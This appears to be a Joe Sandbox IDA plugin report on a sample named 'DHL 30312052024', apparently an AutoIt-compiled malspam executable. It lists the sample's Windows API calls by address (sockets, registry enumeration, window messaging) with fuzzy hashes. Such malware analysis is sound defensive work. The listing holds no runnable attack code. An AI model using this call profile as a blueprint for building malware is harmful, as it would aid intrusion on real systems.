• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: 6558ee531aff72caf32b16aae6124eb90081b2716dc2c0aa0f95c402f5a259b0
• Instruction ID: dc34195332cf7fbbe96eb76cdbb92aabf2e7adcedf4dd442c5ba4c2e0da90be1
• Opcode Fuzzy Hash: 6558ee531aff72caf32b16aae6124eb90081b2716dc2c0aa0f95c402f5a259b0
• Instruction Fuzzy Hash: 5B311E71900109BFDB159F90DC89AFFB7BCEF08304F14016AE912E2141D7745F8A9BA4
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DB2E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DB54
• SysAllocString.OLEAUT32(00000000), ref: 00C5DB57
• SysAllocString.OLEAUT32(?), ref: 00C5DB75
• SysFreeString.OLEAUT32(?), ref: 00C5DB7E
• StringFromGUID2.OLE32(?,?,00000028), ref: 00C5DBA3
• SysAllocString.OLEAUT32(?), ref: 00C5DBB1
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 3b24fcaa9789c99d469312867af4e915a187fee7ad035e93d380b40be3b51809
• Instruction ID: 8fcb5f59641a7ef66894c6282a19be1b9224d2eb1b18c89d7728499faca95ec5
• Opcode Fuzzy Hash: 3b24fcaa9789c99d469312867af4e915a187fee7ad035e93d380b40be3b51809
• Instruction Fuzzy Hash: 8D21B536600319AFDF20DFA9DC88DBF73ADEB09360B11812AFD15DB250D6709D858768
APIs
  • Part of subcall function 00C77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C77DB6
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C761C6
• WSAGetLastError.WSOCK32(00000000), ref: 00C761D5
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C7620E
• connect.WSOCK32(00000000,?,00000010), ref: 00C76217
• WSAGetLastError.WSOCK32 ref: 00C76221
• closesocket.WSOCK32(00000000), ref: 00C7624A
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C76263
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 25d81a48776c401a8e7ef25fdf1c2bed778918c667de1405c79c600b2f8fe712
• Instruction ID: 09917f77adaa6a1f2a28a861384b338fef2525501a198b7e2390379b513cfda7
• Opcode Fuzzy Hash: 25d81a48776c401a8e7ef25fdf1c2bed778918c667de1405c79c600b2f8fe712
• Instruction Fuzzy Hash: 6D31A471600508AFDF10AF24CC85BBD7BACEB45751F048069FD19A72D2DB70AD45DB61
APIs
  • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
  • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C58F14
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C58F27
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00C58F57
  • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: @U=u$ComboBox$ListBox
• API String ID: 365058703-2258501812
• Opcode ID: a1beab3f4a0a7df2549aaa2157adacef8847dd029e36567829f3bbe572954daf
• Instruction ID: 233bcb450b0ede9c69e56b02dc15b8fd78e68ee9fdb93869e7c23ffe3d823f96
• Opcode Fuzzy Hash: a1beab3f4a0a7df2549aaa2157adacef8847dd029e36567829f3bbe572954daf
• Instruction Fuzzy Hash: AD21F279A00108BFDB14ABA09C45DFFB779DF05320F104729F825A71E1DA39198EEA24
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 4cb46860f776ac1a590234fed59e53c6466a2a1803ecb804db1ba6845b828c63
• Instruction ID: 5631df18f27d2a2bbb7f847ad6763d76f35fc895f78effb2fb533906d9cdecbe
• Opcode Fuzzy Hash: 4cb46860f776ac1a590234fed59e53c6466a2a1803ecb804db1ba6845b828c63
• Instruction Fuzzy Hash: AF2137762042216AD738AA35AC02FA773E8DF59781F10443DFC9686491EF509ECBE299
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DC09
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DC2F
• SysAllocString.OLEAUT32(00000000), ref: 00C5DC32
• SysAllocString.OLEAUT32 ref: 00C5DC53
• SysFreeString.OLEAUT32 ref: 00C5DC5C
• StringFromGUID2.OLE32(?,?,00000028), ref: 00C5DC76
• SysAllocString.OLEAUT32(?), ref: 00C5DC84
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: ecf5e2894dc908e3c6f9dcbad37cfba0589882f98cee4977268bf1da7bb9244e
• Instruction ID: 81537dd2e6ffecd6bdedf100fb0cc7d2e32b2b9266b0fcd8a22392af4fe1efa0
• Opcode Fuzzy Hash: ecf5e2894dc908e3c6f9dcbad37cfba0589882f98cee4977268bf1da7bb9244e
• Instruction Fuzzy Hash: 2C218835604214AFDB20DFA8DC88EAB77ECEB49361B108126FD15CB261D670EDC5CB68
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00C5B204
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C5B221
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C5B259
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C5B27F
                                                                                        • _wcsstr.LIBCMT ref: 00C5B289
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3902887630-2594219639
                                                                                        • Opcode ID: bb5d215d4fc8c0b8f08d83acc4944686ce1401cd91ec301a66dcba10348b6183
                                                                                        • Instruction ID: f644b62ab30b62710403621f28738256320f7841c2c80b2a4c9bc175b27c68ce
                                                                                        • Opcode Fuzzy Hash: bb5d215d4fc8c0b8f08d83acc4944686ce1401cd91ec301a66dcba10348b6183
                                                                                        • Instruction Fuzzy Hash: ED2125352042107BEB255B35AC09F7F7FA8DF49711F10412EFC05CA161EF618D81A364
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C59320
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C59352
                                                                                        • __itow.LIBCMT ref: 00C5936A
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C59392
                                                                                        • __itow.LIBCMT ref: 00C593A3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2983881199-2594219639
                                                                                        • Opcode ID: 5e6172b50d8ed5a90d661353f236cb2c7f05fa939a8c8cd23134cd3a2a3ebbfe
                                                                                        • Instruction ID: 69cad088ad72019015e275bf9360a80a86a6aa10a409d62c4ad0881ef27cf50c
                                                                                        • Opcode Fuzzy Hash: 5e6172b50d8ed5a90d661353f236cb2c7f05fa939a8c8cd23134cd3a2a3ebbfe
                                                                                        • Instruction Fuzzy Hash: 0021F539B00208FBDB10AB608C89EAE3BA8EB88711F044069FD04D71E0D6B09E899795
                                                                                        APIs
                                                                                          • Part of subcall function 00C01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C01D73
                                                                                          • Part of subcall function 00C01D35: GetStockObject.GDI32(00000011), ref: 00C01D87
                                                                                          • Part of subcall function 00C01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C01D91
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C87632
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C8763F
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C8764A
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C87659
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C87665
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 0639194eefab6cdd79b376044359f5324c7ceff4099bbd814f3565c8c0a6acf6
                                                                                        • Instruction ID: 2653e4dbc0660312fd5a353a1728af35688407ff233d1d40491998ac92c35a16
                                                                                        • Opcode Fuzzy Hash: 0639194eefab6cdd79b376044359f5324c7ceff4099bbd814f3565c8c0a6acf6
                                                                                        • Instruction Fuzzy Hash: 2C11B6B1110219BFEF159F64CC85EEB7F6DEF08798F114215BA04A20A0D672DC21DBA4
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 00C29AE6
                                                                                          • Part of subcall function 00C23187: EncodePointer.KERNEL32(00000000), ref: 00C2318A
                                                                                          • Part of subcall function 00C23187: __initp_misc_winsig.LIBCMT ref: 00C231A5
                                                                                          • Part of subcall function 00C23187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C29EA0
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C29EB4
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C29EC7
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C29EDA
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C29EED
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C29F00
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C29F13
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C29F26
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C29F39
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C29F4C
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C29F5F
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C29F72
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C29F85
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C29F98
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C29FAB
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C29FBE
                                                                                        • __mtinitlocks.LIBCMT ref: 00C29AEB
                                                                                        • __mtterm.LIBCMT ref: 00C29AF4
                                                                                          • Part of subcall function 00C29B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C29AF9,00C27CD0,00CBA0B8,00000014), ref: 00C29C56
                                                                                          • Part of subcall function 00C29B5C: _free.LIBCMT ref: 00C29C5D
                                                                                          • Part of subcall function 00C29B5C: DeleteCriticalSection.KERNEL32(00CBEC00,?,?,00C29AF9,00C27CD0,00CBA0B8,00000014), ref: 00C29C7F
                                                                                        • __calloc_crt.LIBCMT ref: 00C29B19
                                                                                        • __initptd.LIBCMT ref: 00C29B3B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00C29B42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 3567560977-0
                                                                                        • Opcode ID: 6438904bd1e3bf9052bc16dfed46cbdbeeeb8da800d33c0bfb39a26cc50da115
                                                                                        • Instruction ID: 2c163086b6282a129be4f9923cc5dffda8b4e8dc2933ba1646908960fabec2a3
                                                                                        • Opcode Fuzzy Hash: 6438904bd1e3bf9052bc16dfed46cbdbeeeb8da800d33c0bfb39a26cc50da115
                                                                                        • Instruction Fuzzy Hash: ECF09A32619731AAE6347B74BC07B8E2690EF02B30F200A2AF465D69D2EF71894165A4
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C23F85), ref: 00C24085
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00C2408C
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00C24097
                                                                                        • DecodePointer.KERNEL32(00C23F85), ref: 00C240B2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 3489934621-2819208100
                                                                                        • Opcode ID: 3eb0170f74847a06afc4e3a206e3ea1ed070befc36908c13df9cb43ab8f27749
                                                                                        • Instruction ID: e6389870d27ec39baeb8511378311af85cfd38428672e1e5b860b4685ddb6eb9
                                                                                        • Opcode Fuzzy Hash: 3eb0170f74847a06afc4e3a206e3ea1ed070befc36908c13df9cb43ab8f27749
                                                                                        • Instruction Fuzzy Hash: 35E09271581240AFEA20AF62FD0DB4D3AA4B704742F148029F111E10E0CBB64641DB18
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3253778849-0
                                                                                        • Opcode ID: ef50ae5c25668af8b02fce2141f51b72681a68da295338dd53ce24912e083d37
                                                                                        • Instruction ID: 794f43b6b4cead917b1166026a592da2af697e5ab05e06436c0082943ca4c651
                                                                                        • Opcode Fuzzy Hash: ef50ae5c25668af8b02fce2141f51b72681a68da295338dd53ce24912e083d37
                                                                                        • Instruction Fuzzy Hash: 48617A7090425A9BCF21EF60DC82AFE37A9AF05308F058619F8566B2D3DB74E945EB50
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C802BD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C802FD
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C80320
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C80349
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C8038C
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C80399
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4046560759-0
                                                                                        • Opcode ID: e1c42b4ccc4f4fd7202ad9226ddb29f56a133e54f1f824cdc65d0c5924d17cbe
                                                                                        • Instruction ID: fc79f1bde4ca27c2ece6195da0e6f55bc2aa9078f6b17995dee29acc048e327a
                                                                                        • Opcode Fuzzy Hash: e1c42b4ccc4f4fd7202ad9226ddb29f56a133e54f1f824cdc65d0c5924d17cbe
                                                                                        • Instruction Fuzzy Hash: 09515A31208200AFC714EF64C885E6FBBE8FF85318F54491DF995872A2DB31E949DB56
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00C857FB
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00C85832
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C8585A
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00C858C9
                                                                                        • GetSubMenu.USER32(?,?), ref: 00C858D7
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C85928
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: c9de490c4629ae2f38eb3fe5d2cf8497308794a1d947d5de27fd0dfed071048f
                                                                                        • Instruction ID: 18a7a707acd50e31e648c91dd6f20a190072b614c859a5f53d8caab841aaf26b
                                                                                        • Opcode Fuzzy Hash: c9de490c4629ae2f38eb3fe5d2cf8497308794a1d947d5de27fd0dfed071048f
                                                                                        • Instruction Fuzzy Hash: 7F517F75E00615EFCF11EF64C845AAEB7B4EF48324F10406AE851BB392CB74AE41DB94
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C5EF06
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00C5EF78
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00C5EFD3
                                                                                        • _memmove.LIBCMT ref: 00C5EFFD
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C5F04A
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C5F078
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1101466143-0
